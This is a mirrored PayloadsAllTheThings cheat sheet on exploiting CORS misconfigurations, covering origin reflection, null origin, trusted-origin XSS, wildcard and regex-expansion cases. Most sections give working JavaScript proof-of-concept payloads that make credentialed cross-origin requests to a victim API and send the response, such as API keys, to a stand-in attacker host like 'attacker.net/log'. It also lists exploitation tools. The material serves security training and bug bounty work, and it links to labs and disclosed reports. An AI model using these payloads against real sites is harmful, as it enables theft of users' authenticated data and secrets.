mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-07 03:55:27 +00:00
283 lines
9.4 KiB
Markdown
283 lines
9.4 KiB
Markdown
# CORS Misconfiguration
|
||
|
||
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials.
|
||
|
||
|
||
## Summary
|
||
|
||
* [Tools](#tools)
|
||
* [Requirements](#requirements)
|
||
* [Methodology](#methodology)
|
||
* [Origin Reflection](#origin-reflection)
|
||
* [Null Origin](#null-origin)
|
||
* [XSS on Trusted Origin](#xss-on-trusted-origin)
|
||
* [Wildcard Origin without Credentials](#wildcard-origin-without-credentials)
|
||
* [Expanding the Origin](#expanding-the-origin)
|
||
* [Labs](#labs)
|
||
* [References](#references)
|
||
|
||
|
||
## Tools
|
||
|
||
* [s0md3v/Corsy](https://github.com/s0md3v/Corsy/) - CORS Misconfiguration Scanner
|
||
* [chenjj/CORScanner](https://github.com/chenjj/CORScanner) - Fast CORS misconfiguration vulnerabilities scanner
|
||
* [@honoki/PostMessage](https://tools.honoki.net/postmessage.html) - POC Builder
|
||
* [trufflesecurity/of-cors](https://github.com/trufflesecurity/of-cors) - Exploit CORS misconfigurations on the internal networks
|
||
* [omranisecurity/CorsOne](https://github.com/omranisecurity/CorsOne) - Fast CORS Misconfiguration Discovery Tool
|
||
|
||
|
||
## Requirements
|
||
|
||
* BURP HEADER> `Origin: https://evil.com`
|
||
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
||
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
|
||
|
||
|
||
## Methodology
|
||
|
||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
|
||
|
||
### Origin Reflection
|
||
|
||
#### Vulnerable Implementation
|
||
|
||
```powershell
|
||
GET /endpoint HTTP/1.1
|
||
Host: victim.example.com
|
||
Origin: https://evil.com
|
||
Cookie: sessionid=...
|
||
|
||
HTTP/1.1 200 OK
|
||
Access-Control-Allow-Origin: https://evil.com
|
||
Access-Control-Allow-Credentials: true
|
||
|
||
{"[private API key]"}
|
||
```
|
||
|
||
#### Proof Of Concept
|
||
|
||
This PoC requires that the respective JS script is hosted at `evil.com`
|
||
|
||
```js
|
||
var req = new XMLHttpRequest();
|
||
req.onload = reqListener;
|
||
req.open('get','https://victim.example.com/endpoint',true);
|
||
req.withCredentials = true;
|
||
req.send();
|
||
|
||
function reqListener() {
|
||
location='//attacker.net/log?key='+this.responseText;
|
||
};
|
||
```
|
||
|
||
or
|
||
|
||
```html
|
||
<html>
|
||
<body>
|
||
<h2>CORS PoC</h2>
|
||
<div id="demo">
|
||
<button type="button" onclick="cors()">Exploit</button>
|
||
</div>
|
||
<script>
|
||
function cors() {
|
||
var xhr = new XMLHttpRequest();
|
||
xhr.onreadystatechange = function() {
|
||
if (this.readyState == 4 && this.status == 200) {
|
||
document.getElementById("demo").innerHTML = alert(this.responseText);
|
||
}
|
||
};
|
||
xhr.open("GET",
|
||
"https://victim.example.com/endpoint", true);
|
||
xhr.withCredentials = true;
|
||
xhr.send();
|
||
}
|
||
</script>
|
||
</body>
|
||
</html>
|
||
```
|
||
|
||
### Null Origin
|
||
|
||
#### Vulnerable Implementation
|
||
|
||
It's possible that the server does not reflect the complete `Origin` header but
|
||
that the `null` origin is allowed. This would look like this in the server's
|
||
response:
|
||
|
||
```
|
||
GET /endpoint HTTP/1.1
|
||
Host: victim.example.com
|
||
Origin: null
|
||
Cookie: sessionid=...
|
||
|
||
HTTP/1.1 200 OK
|
||
Access-Control-Allow-Origin: null
|
||
Access-Control-Allow-Credentials: true
|
||
|
||
{"[private API key]"}
|
||
```
|
||
|
||
#### Proof Of Concept
|
||
|
||
This can be exploited by putting the attack code into an iframe using the data
|
||
URI scheme. If the data URI scheme is used, the browser will use the `null`
|
||
origin in the request:
|
||
|
||
```html
|
||
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
|
||
var req = new XMLHttpRequest();
|
||
req.onload = reqListener;
|
||
req.open('get','https://victim.example.com/endpoint',true);
|
||
req.withCredentials = true;
|
||
req.send();
|
||
|
||
function reqListener() {
|
||
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||
};
|
||
</script>"></iframe>
|
||
```
|
||
|
||
### XSS on Trusted Origin
|
||
|
||
If the application does implement a strict whitelist of allowed origins, the
|
||
exploit codes from above do not work. But if you have an XSS on a trusted
|
||
origin, you can inject the exploit coded from above in order to exploit CORS
|
||
again.
|
||
|
||
```
|
||
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
|
||
```
|
||
|
||
### Wildcard Origin without Credentials
|
||
|
||
If the server responds with a wildcard origin `*`, **the browser does never send
|
||
the cookies**. However, if the server does not require authentication, it's still
|
||
possible to access the data on the server. This can happen on internal servers
|
||
that are not accessible from the Internet. The attacker's website can then
|
||
pivot into the internal network and access the server's data without authentication.
|
||
|
||
```powershell
|
||
* is the only wildcard origin
|
||
https://*.example.com is not valid
|
||
```
|
||
|
||
#### Vulnerable Implementation
|
||
|
||
```powershell
|
||
GET /endpoint HTTP/1.1
|
||
Host: api.internal.example.com
|
||
Origin: https://evil.com
|
||
|
||
HTTP/1.1 200 OK
|
||
Access-Control-Allow-Origin: *
|
||
|
||
{"[private API key]"}
|
||
```
|
||
|
||
#### Proof Of Concept
|
||
|
||
```js
|
||
var req = new XMLHttpRequest();
|
||
req.onload = reqListener;
|
||
req.open('get','https://api.internal.example.com/endpoint',true);
|
||
req.send();
|
||
|
||
function reqListener() {
|
||
location='//attacker.net/log?key='+this.responseText;
|
||
};
|
||
```
|
||
|
||
|
||
### Expanding the Origin
|
||
|
||
Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
|
||
|
||
#### Vulnerable Implementation (Example 1)
|
||
|
||
In this scenario any prefix inserted in front of `example.com` will be accepted by the server.
|
||
|
||
```
|
||
GET /endpoint HTTP/1.1
|
||
Host: api.example.com
|
||
Origin: https://evilexample.com
|
||
|
||
HTTP/1.1 200 OK
|
||
Access-Control-Allow-Origin: https://evilexample.com
|
||
Access-Control-Allow-Credentials: true
|
||
|
||
{"[private API key]"}
|
||
|
||
```
|
||
|
||
#### Proof of Concept (Example 1)
|
||
|
||
This PoC requires the respective JS script to be hosted at `evilexample.com`
|
||
|
||
```js
|
||
var req = new XMLHttpRequest();
|
||
req.onload = reqListener;
|
||
req.open('get','https://api.example.com/endpoint',true);
|
||
req.withCredentials = true;
|
||
req.send();
|
||
|
||
function reqListener() {
|
||
location='//attacker.net/log?key='+this.responseText;
|
||
};
|
||
```
|
||
|
||
#### Vulnerable Implementation (Example 2)
|
||
|
||
In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain.
|
||
|
||
```
|
||
GET /endpoint HTTP/1.1
|
||
Host: api.example.com
|
||
Origin: https://apiiexample.com
|
||
|
||
HTTP/1.1 200 OK
|
||
Access-Control-Allow-Origin: https://apiiexample.com
|
||
Access-Control-Allow-Credentials: true
|
||
|
||
{"[private API key]"}
|
||
|
||
```
|
||
|
||
#### Proof of concept (Example 2)
|
||
|
||
This PoC requires the respective JS script to be hosted at `apiiexample.com`
|
||
|
||
```js
|
||
var req = new XMLHttpRequest();
|
||
req.onload = reqListener;
|
||
req.open('get','https://api.example.com/endpoint',true);
|
||
req.withCredentials = true;
|
||
req.send();
|
||
|
||
function reqListener() {
|
||
location='//attacker.net/log?key='+this.responseText;
|
||
};
|
||
```
|
||
|
||
|
||
## Labs
|
||
|
||
* [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
|
||
* [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
|
||
* [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
|
||
* [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
|
||
|
||
|
||
## References
|
||
|
||
- [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298)
|
||
- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
|
||
- [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147)
|
||
- [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249)
|
||
- [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574)
|
||
- [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
|
||
- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
|
||
- [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200)
|
||
- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||
- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||
- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) |